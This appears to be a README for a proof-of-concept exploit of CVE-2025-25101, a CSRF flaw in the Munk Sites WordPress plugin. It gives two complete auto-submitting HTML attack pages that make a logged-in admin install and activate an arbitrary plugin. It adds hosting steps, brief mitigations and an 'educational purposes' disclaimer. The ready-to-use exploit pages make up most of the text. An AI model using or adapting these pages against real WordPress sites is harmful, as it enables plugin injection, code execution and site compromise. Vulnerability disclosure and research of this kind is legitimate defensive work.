
WordPress Munk Sites plugin <= 1.0.7 - CSRF to Arbitrary Plugin Installation vulnerability
CVE-2025-25101 is a Cross-Site Request Forgery (CSRF) vulnerability in the MetricThemes Munk Sites plugin for WordPress (versions ≤ 1.0.7).
This vulnerability allows an unauthenticated attacker to trick an admin into installing and activating arbitrary plugins, potentially leading to Remote Code Execution (RCE) or website compromise.
<= 1.0.7Any version where the plugin is active| Score | Severity | Version | Vector String |
|---|
| 9.6 | 🔥 CRITICAL | 3.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
The CSRF flaw in the Munk Sites plugin allows an attacker to force a logged-in WordPress admin to install and activate any WordPress plugin without their consent.
This is done by exploiting an unprotected admin-ajax.php request that lacks CSRF token verification.
This payload forces the victim to install the hello-world plugin.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Installation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #5bc0de; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Installing plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_install_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>
This payload forces the victim to activate the hello-world plugin.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Activation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #f0ad4e; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>📌 CVE-2025-25101</h1>
<h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
<h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">🔄 Activating plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_active_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>
install.html and activate.html) on an attacker-controlled server.install.html.activate.html.hello-world plugin will be installed and activated without admin consent!admin-ajax.php using security rules in .htaccess or Nginx config.wp_nonce_field() and check_admin_referer().⚠️ This exploit is for educational and security research purposes only.
⚠️ Unauthorized use against systems without explicit permission is illegal.
⚠️ The author is not responsible for any misuse of this code.
If you find this research valuable, feel free to ⭐ star the repository and contribute by reporting new vulnerabilities.
By: Nxploit | Khaled Alenazi